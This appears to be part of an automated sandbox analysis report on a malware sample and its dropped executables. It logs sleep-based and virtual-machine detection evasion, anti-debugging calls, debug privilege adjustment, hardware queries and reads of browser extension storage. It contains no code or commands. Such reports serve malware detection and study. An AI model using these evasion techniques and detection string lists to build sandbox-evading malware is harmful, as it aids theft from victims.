Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300	Thread sleep count: 2348 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe TID: 7808	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548	Thread sleep count: 821 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6944	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 7932	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep count: 6424 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep count: 491 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 7864	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -600000s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -599745s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 704	Thread sleep time: -18000000s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -583656s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -580984s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -579906s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -579422s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -577140s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -576531s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -574172s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -573562s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -572890s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -572375s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -572000s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -571703s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -571375s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -571140s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -570906s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -570751s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -570627s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -568775s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -568562s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -568446s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -568203s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -568020s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -567828s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -567651s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -567527s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -567390s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -565203s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -565053s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -564656s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -564493s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -564381s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -564115s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -563984s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -563875s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -563764s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -563656s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -563542s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -562034s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -561919s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -561812s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -561702s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -561586s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -561467s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -561351s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -560689s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -560578s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -560439s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -560319s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -560199s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -560053s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -558589s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -558481s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -558375s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -558265s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -558155s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -558043s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -557929s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -557811s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -557702s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -557585s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -557479s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -557358s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -557250s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -557139s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -557031s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -556922s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 6956	Thread sleep time: -556812s >= -30000s
Source: C:\Recovery\HpQPPZazcv.exe TID: 7608	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Recovery\HpQPPZazcv.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\HpQPPZazcv.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\HpQPPZazcv.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00D9C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00D9C4A8
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DAE560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00DAE560
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D017F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	1_2_00007FF67D017F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D017F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	1_2_00007FF67D017F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D021FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF67D021FE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D008B00 FindFirstFileExW,FindClose,	1_2_00007FF67D008B00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B32DCE0 FindFirstFileExW,	2_2_000001F91B32DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF7272685A0 FindFirstFileExW,FindClose,	2_2_00007FF7272685A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF7272679B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF7272679B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727280B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF727280B84
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A4DCE0 FindFirstFileExW,	4_2_00000201D1A4DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF7272685A0 FindFirstFileExW,FindClose,	4_2_00007FF7272685A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727280B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	4_2_00007FF727280B84
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF7272679B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	4_2_00007FF7272679B0

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

Code function: 0_2_00DB0B80 VirtualQuery,GetSystemInfo,

0_2_00DB0B80

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 30000
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 599745
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 3600000
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 583656
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 580984
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 579906
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 579422
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 577140
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 576531
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 574172
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 573562
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 572890
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 572375
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 572000
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 571703
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 571375
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 571140
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 570906
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 570751
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 570627
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 568775
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 568562
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 568446
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 568203
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 568020
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 567828
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 567651
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 567527
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 567390
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 565203
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 565053
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 564656
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 564493
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 564381
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 564115
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 563984
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 563875
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 563764
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 563656
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 563542
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 562034
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 561919
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 561812
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 561702
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 561586
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 561467
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 561351
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 560689
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 560578
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 560439
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 560319
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 560199
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 560053
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 558589
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 558481
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 558375
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 558265
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 558155
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 558043
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557929
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557811
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557702
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557585
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557479
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557358
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557250
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557139
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557031
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 556922
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 556812
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\	Jump to behavior

Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: s.exe, 00000007.00000003.1702500179.00000000076F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1722014407.0000000005600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RcF33KCGtqeMuNK3lOt
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: 8Ck8T5qRcC.exe, 00000000.00000002.1681039816.0000000000A28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}?v
Source: s.exe, 00000007.00000002.1731347813.0000000007E50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: based.exe, 00000004.00000002.2382641297.00000201D086B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1858412342.00000201D086B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2376943014.00000201D086B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2380067127.00000201D086B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1871128429.00000201D086B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2359818591.00000201D086B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: based.exe, 00000004.00000003.1852139141.00000201D0838000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1877831426.00000201D081E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1857154542.00000201D081F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2387215842.00000201D1569000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1852422435.00000201D0838000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

API call chain: ExitProcess graph end node

graph_0-24893

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

Code function: 0_2_00DB647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00DB647F

Source: C:\ProgramData\Microsoft\based.exe

Code function: 4_2_00007FFDFAC50740 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

4_2_00007FFDFAC50740

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

Code function: 0_2_00DBA640 mov eax, dword ptr fs:[00000030h]

0_2_00DBA640

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

Code function: 0_2_00DBE680 GetProcessHeap,

0_2_00DBE680

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Recovery\HpQPPZazcv.exe	Process token adjusted: Debug
Source: C:\Recovery\HpQPPZazcv.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DB215D SetUnhandledExceptionFilter,	0_2_00DB215D
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DB12D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00DB12D7
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DB647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00DB647F
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DB1FCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00DB1FCA
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D00C67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF67D00C67C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D00BDE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FF67D00BDE0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D00C860 SetUnhandledExceptionFilter,	1_2_00007FF67D00C860
